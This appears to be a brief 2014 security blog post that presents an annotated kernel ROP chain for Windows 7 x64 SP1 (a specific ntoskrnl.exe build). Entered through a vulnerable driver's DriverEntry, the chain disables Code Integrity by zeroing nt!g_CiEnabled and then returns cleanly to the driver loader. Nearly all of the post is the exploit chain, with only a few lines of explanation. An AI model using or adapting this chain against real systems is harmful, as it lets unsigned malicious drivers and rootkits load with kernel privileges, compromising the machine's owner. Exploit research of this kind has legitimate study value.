Posts Tagged ‘rop’
ROP for Windows 7 x64 to bypass Code Integrity from vulnerable DriverEntry
August 18, 2014
Leave a comment
RET instructions are omitted
;; ;; NT Kernel ROP chain to bypass Code Integrity on Windows 7 x64 SP1 from IopLoadDriver ;; ;; ntoskrnl.exe ;; 6.1.7601.18409 ;; pop rax ; rsp + 10 ; skip this gets replaced pop rax ; rsp + 20 ; nt!g_CiEnabled mov byte ptr [rax], 0 ; rsp + 28 ; nt!g_CiEnabled = 0 pop rax ; rsp + 38 ; align stack pop rax ; rsp + 48 ; align stack xor eax, eax ; rsp + 50 ; STATUS_SUCCESS add rsp, 240h ; rsp + 290 ; epilogue pop r15 pop r14 pop r13 pop r12 pop rdi pop rsi pop rbp retn ; return to IopLoadUnloadDriver
Categories: Uncategorized
bof, buffer-overflow, exploit, kernel, rop, windows, x64